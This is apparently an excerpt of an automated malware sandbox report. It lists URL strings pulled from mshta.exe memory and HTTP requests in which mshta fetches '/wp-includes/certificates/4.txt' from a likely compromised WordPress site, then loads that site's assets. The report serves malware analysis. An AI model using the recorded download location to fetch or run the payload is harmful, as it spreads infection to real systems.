Source: mshta.exe, 00000008.00000002.1178615460.00000000054AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotnner_wra
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotsonry_foli
Source: mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot
Source: mshta.exe, 00000008.00000003.958313546.0000000000429000.00000004.00000020.00020000.00000000.sdmp, css[1].css1.8.dr, css[1].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);e
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot-arro
Source: jquery.mobilemenu[1].js.8.drString found in binary or memory: http://github.com/mambows/mobilemenu
Source: style[1].css.8.drString found in binary or memory: http://info.template-help.com/help/
Source: jquery.mobilemenu[1].js.8.drString found in binary or memory: http://jquery.com
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://kyruus.com
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/maps/api/js?v=3.exp&key=AIzaSyBXSoaDpFMSx5Mw41I7DfRd1h7fJUulK_0#038;ver=4
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1?ver=2.9.2
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1.NET4.0E)
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1ET4.0E)
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: animate-logo[1].css.8.dr, jquery.jplayer.min[1].js.8.drString found in binary or memory: http://opensource.org/licenses/MIT
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://opensource.org/licenses/mit-license.html
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://scripts.sil.org/OFL
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg.0=1.7.2
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/0
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/5
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2US
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2ip
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://twitter.com/byscuits
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://twitter.com/fontawesome.
Source: responsive[1].css.8.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: bootstrap.min[1].js.8.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
Source: mshta.exe, 00000008.00000003.937380901.00000000003B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.broofa.com
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.gnu.org/copyleft/gpl.html
Source: flexslider[1].css.8.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: jquery.jplayer.min[1].js.8.dr, jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.jplayer.org
Source: jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://www.mathias-bank.de)
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, camera.min[1].js.8.dr, swfobject[1].js.8.dr, jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: flexslider[1].css.8.drString found in binary or memory: http://www.woothemes.com/flexslider/
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://app.vzaar.com/videos/:id
Source: mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/EventTarget/addEventListener
Source: scripts[1].js.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CustomEvent/CustomEvent
Source: mshta.exe, 00000008.00000003.937380901.00000000003B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling
Source: mshta.exe, 00000008.00000003.937380901.00000000003B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/maps/documentation/javascript/vector-map
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#about_section
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#about_section&
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#about_section(
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#contatos
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estrutura
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estrutura.br/R
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estruturapng
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section00
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section=1.2.8.1da
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#segmentos
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#segmentosT
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#servicos
Source: mshta.exe, 00000008.00000002.1172304935.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/P/1.1
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/comments/feed/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/comments/feed/mplate5
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/feed/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/feed/atom/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/feed/atom/Y
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-admin/admin-ajax.phh:
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-admin/admin-ajax.php
Source: mshta.exe, 00000008.00000002.1170171663.0000000003113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-admin/admin-ajax.phpustom
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-json/
Source: mshta.exe, 00000008.00000002.1170226312.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-json/contact-form-7/v1
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/xmlrpc.php?rsd
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.theme.default.min[1].css.8.dr, owl.carousel.min[1].css.8.dr, owl.carousel[1].js.8.drString found in binary or memory: https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036205604.0000000004825000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174196123.000000000482C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036412519.0000000004828000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036484778.0000000004829000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036357765.0000000004827000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036567110.000000000482B000.00000004.00000800.00020000.00000000.sdmp, superfish[1].js.8.drString found in binary or memory: https://github.com/joeldbirch/onHoverIntent
Source: animate-logo[1].css.8.drString found in binary or memory: https://github.com/nickpettit/glide
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, jquery.simplr.smoothscroll.min[1].js.8.drString found in binary or memory: https://github.com/simov/simplr-smoothscroll
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gtranslate.io/
Source: mshta.exe, 00000008.00000002.1168124115.0000000000411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh6.ggpht.com/s
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com/maps/api/js?v=3.exp&sensor=false
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://regexper.com/#(http%3A%7Chttps%3A%7C)%5C%2F%5C%2F(player.%7Cwww.%7Capp.)%3F(vimeo%5C.com%7Cy
Source: mshta.exe, 00000008.00000003.946411412.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1061193305.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169795103.0000000002FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.w.org/images/core/emoji/11/svg/https://s.w.org/images/core/emoji/11/72x72/NatKL$:
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/B
Source: mshta.exe, 00000008.00000002.1168752912.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2S
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/y
Source: mshta.exe, 00000008.00000003.1061193305.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169795103.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.946406016.0000000002FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twemoji.maxcdn.com/2/wp-exclude-emoji
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/:id
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/channels/:channel/:id
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/groups/:group/videos/:id
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://www.youtube.com/watch?v=:id
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://youtu.be/:id
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\css[1].cssJump to behavior
Source: unknownDNS traffic detected: queries for: facextrade.com.br
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/certificates/4.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: netdna.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
